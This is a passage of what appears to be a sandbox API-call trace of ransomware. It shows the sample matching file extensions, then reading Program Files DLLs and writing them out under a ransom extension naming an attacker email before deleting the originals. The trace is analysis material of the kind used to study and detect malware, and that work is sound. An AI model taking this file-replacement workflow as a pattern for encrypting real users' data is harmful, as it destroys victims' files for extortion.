shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.027] lstrlenW (lpString=".doc") returned 4 [0182.027] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.027] lstrlenW (lpString=".docx") returned 5 [0182.027] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0182.027] lstrlenW (lpString=".pdf") returned 4 [0182.027] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.027] lstrlenW (lpString=".xls") returned 4 [0182.027] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.027] lstrlenW (lpString=".xlsx") returned 5 [0182.027] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0182.027] lstrlenW (lpString=".ppt") returned 4 [0182.027] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.027] lstrlenW (lpString=".zip") returned 4 [0182.027] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.027] lstrlenW (lpString=".rar") returned 4 [0182.027] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.028] lstrlenW (lpString=".bz2") returned 4 [0182.028] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.028] lstrlenW (lpString=".7z") returned 3 [0182.028] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.028] lstrlenW (lpString=".dbf") returned 4 [0182.028] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.028] lstrlenW (lpString=".1cd") returned 4 [0182.028] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.028] lstrlenW (lpString=".jpg") returned 4 [0182.028] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.028] lstrlenW (lpString=".doc") returned 4 [0182.028] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.028] lstrlenW (lpString=".docx") returned 5 [0182.028] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0182.028] lstrlenW (lpString=".pdf") returned 4 [0182.028] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.028] lstrlenW (lpString=".xls") returned 4 [0182.028] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.028] lstrlenW (lpString=".xlsx") returned 5 [0182.028] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0182.028] lstrlenW (lpString=".ppt") returned 4 [0182.029] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.029] lstrlenW (lpString=".zip") returned 4 [0182.029] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.029] lstrlenW (lpString=".rar") returned 4 [0182.029] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.029] lstrlenW (lpString=".bz2") returned 4 [0182.029] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.029] lstrlenW (lpString=".7z") returned 3 [0182.029] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.029] lstrlenW (lpString=".dbf") returned 4 [0182.029] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.029] lstrlenW (lpString=".1cd") returned 4 [0182.029] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 73 [0182.029] lstrlenW (lpString=".jpg") returned 4 [0182.029] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.029] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0182.029] lstrlenW (lpString="vccorlib140.dll") returned 15 [0182.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0182.030] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=390320) returned 1 [0182.030] CloseHandle (hObject=0x33c) returned 1 [0182.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll")) returned 0x20 [0182.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0182.031] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.031] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0182.031] GetLastError () returned 0x0 [0182.031] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x5f4b0, lpOverlapped=0x0) returned 1 [0182.119] WriteFile (in: hFile=0x354, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x5f4c0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x5f4c0, lpOverlapped=0x0) returned 1 [0182.126] ReadFile (in: hFile=0x33c, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.126] WriteFile (in: hFile=0x354, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xf2, lpOverlapped=0x0) returned 1 [0182.126] SetEndOfFile (hFile=0x354) returned 1 [0182.127] CloseHandle (hObject=0x354) returned 1 [0182.127] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.127] SetEndOfFile (hFile=0x33c) returned 1 [0182.131] CloseHandle (hObject=0x33c) returned 1 [0182.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0182.131] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll")) returned 1 [0182.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.131] lstrlenW (lpString=".doc") returned 4 [0182.131] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.131] lstrlenW (lpString=".docx") returned 5 [0182.131] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0182.131] lstrlenW (lpString=".pdf") returned 4 [0182.131] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.131] lstrlenW (lpString=".xls") returned 4 [0182.131] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.131] lstrlenW (lpString=".xlsx") returned 5 [0182.131] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0182.131] lstrlenW (lpString=".ppt") returned 4 [0182.131] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.132] lstrlenW (lpString=".zip") returned 4 [0182.132] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.132] lstrlenW (lpString=".rar") returned 4 [0182.132] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.132] lstrlenW (lpString=".bz2") returned 4 [0182.132] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.132] lstrlenW (lpString=".7z") returned 3 [0182.132] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.132] lstrlenW (lpString=".dbf") returned 4 [0182.132] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.132] lstrlenW (lpString=".1cd") returned 4 [0182.132] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.132] lstrlenW (lpString=".jpg") returned 4 [0182.132] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.132] lstrlenW (lpString=".doc") returned 4 [0182.132] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.132] lstrlenW (lpString=".docx") returned 5 [0182.132] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0182.132] lstrlenW (lpString=".pdf") returned 4 [0182.132] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.132] lstrlenW (lpString=".xls") returned 4 [0182.132] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.132] lstrlenW (lpString=".xlsx") returned 5 [0182.132] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0182.132] lstrlenW (lpString=".ppt") returned 4 [0182.133] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.133] lstrlenW (lpString=".zip") returned 4 [0182.133] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.133] lstrlenW (lpString=".rar") returned 4 [0182.133] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.133] lstrlenW (lpString=".bz2") returned 4 [0182.133] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.133] lstrlenW (lpString=".7z") returned 3 [0182.133] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.133] lstrlenW (lpString=".dbf") returned 4 [0182.133] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.133] lstrlenW (lpString=".1cd") returned 4 [0182.133] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 73 [0182.133] lstrlenW (lpString=".jpg") returned 4 [0182.133] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.133] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0182.133] lstrlenW (lpString="vcruntime140.dll") returned 16 [0182.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0182.134] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=88752) returned 1 [0182.134] CloseHandle (hObject=0x33c) returned 1 [0182.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll")) returned 0x20 [0182.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.135] lstrlenW (lpString=".doc") returned 4 [0182.135] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.135] lstrlenW (lpString=".docx") returned 5 [0182.135] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0182.135] lstrlenW (lpString=".pdf") returned 4 [0182.135] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.135] lstrlenW (lpString=".xls") returned 4 [0182.135] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.135] lstrlenW (lpString=".xlsx") returned 5 [0182.135] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0182.135] lstrlenW (lpString=".ppt") returned 4 [0182.135] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.135] lstrlenW (lpString=".zip") returned 4 [0182.135] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.135] lstrlenW (lpString=".rar") returned 4 [0182.135] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.135] lstrlenW (lpString=".bz2") returned 4 [0182.135] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.135] lstrlenW (lpString=".7z") returned 3 [0182.135] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.135] lstrlenW (lpString=".dbf") returned 4 [0182.135] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.135] lstrlenW (lpString=".1cd") returned 4 [0182.135] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.136] lstrlenW (lpString=".jpg") returned 4 [0182.136] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.136] lstrlenW (lpString=".doc") returned 4 [0182.136] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.136] lstrlenW (lpString=".docx") returned 5 [0182.136] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0182.136] lstrlenW (lpString=".pdf") returned 4 [0182.136] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.136] lstrlenW (lpString=".xls") returned 4 [0182.136] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.136] lstrlenW (lpString=".xlsx") returned 5 [0182.136] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0182.136] lstrlenW (lpString=".ppt") returned 4 [0182.136] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.136] lstrlenW (lpString=".zip") returned 4 [0182.136] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.136] lstrlenW (lpString=".rar") returned 4 [0182.136] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.136] lstrlenW (lpString=".bz2") returned 4 [0182.136] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.136] lstrlenW (lpString=".7z") returned 3 [0182.136] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.136] lstrlenW (lpString=".dbf") returned 4 [0182.136] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.136] lstrlenW (lpString=".1cd") returned 4 [0182.137] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 74 [0182.137] lstrlenW (lpString=".jpg") returned 4 [0182.137] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.137] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0182.137] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0182.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0182.494] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=10752) returned 1 [0182.494] CloseHandle (hObject=0x384) returned 1 [0182.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0182.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.501] lstrlenW (lpString=".doc") returned 4 [0182.501] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.501] lstrlenW (lpString=".docx") returned 5 [0182.501] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.501] lstrlenW (lpString=".pdf") returned 4 [0182.501] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.501] lstrlenW (lpString=".xls") returned 4 [0182.501] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.501] lstrlenW (lpString=".xlsx") returned 5 [0182.501] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.501] lstrlenW (lpString=".ppt") returned 4 [0182.501] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.501] lstrlenW (lpString=".zip") returned 4 [0182.501] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.501] lstrlenW (lpString=".rar") returned 4 [0182.501] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.501] lstrlenW (lpString=".bz2") returned 4 [0182.501] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.501] lstrlenW (lpString=".7z") returned 3 [0182.501] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.501] lstrlenW (lpString=".dbf") returned 4 [0182.501] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.502] lstrlenW (lpString=".1cd") returned 4 [0182.502] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.502] lstrlenW (lpString=".jpg") returned 4 [0182.502] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.502] lstrlenW (lpString=".doc") returned 4 [0182.502] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.502] lstrlenW (lpString=".docx") returned 5 [0182.502] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.502] lstrlenW (lpString=".pdf") returned 4 [0182.502] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.502] lstrlenW (lpString=".xls") returned 4 [0182.502] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.502] lstrlenW (lpString=".xlsx") returned 5 [0182.502] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.502] lstrlenW (lpString=".ppt") returned 4 [0182.502] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.502] lstrlenW (lpString=".zip") returned 4 [0182.502] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.502] lstrlenW (lpString=".rar") returned 4 [0182.502] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.502] lstrlenW (lpString=".bz2") returned 4 [0182.502] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.502] lstrlenW (lpString=".7z") returned 3 [0182.503] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.503] lstrlenW (lpString=".dbf") returned 4 [0182.503] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.503] lstrlenW (lpString=".1cd") returned 4 [0182.503] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0182.503] lstrlenW (lpString=".jpg") returned 4 [0182.503] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.503] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0182.503] lstrlenW (lpString="mip.exe") returned 7 [0182.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0182.504] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=1540608) returned 1 [0182.504] CloseHandle (hObject=0x384) returned 1 [0182.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe")) returned 0x20 [0182.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.000] lstrlenW (lpString=".doc") returned 4 [0183.000] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0183.000] lstrlenW (lpString=".docx") returned 5 [0183.000] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0183.000] lstrlenW (lpString=".pdf") returned 4 [0183.000] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0183.000] 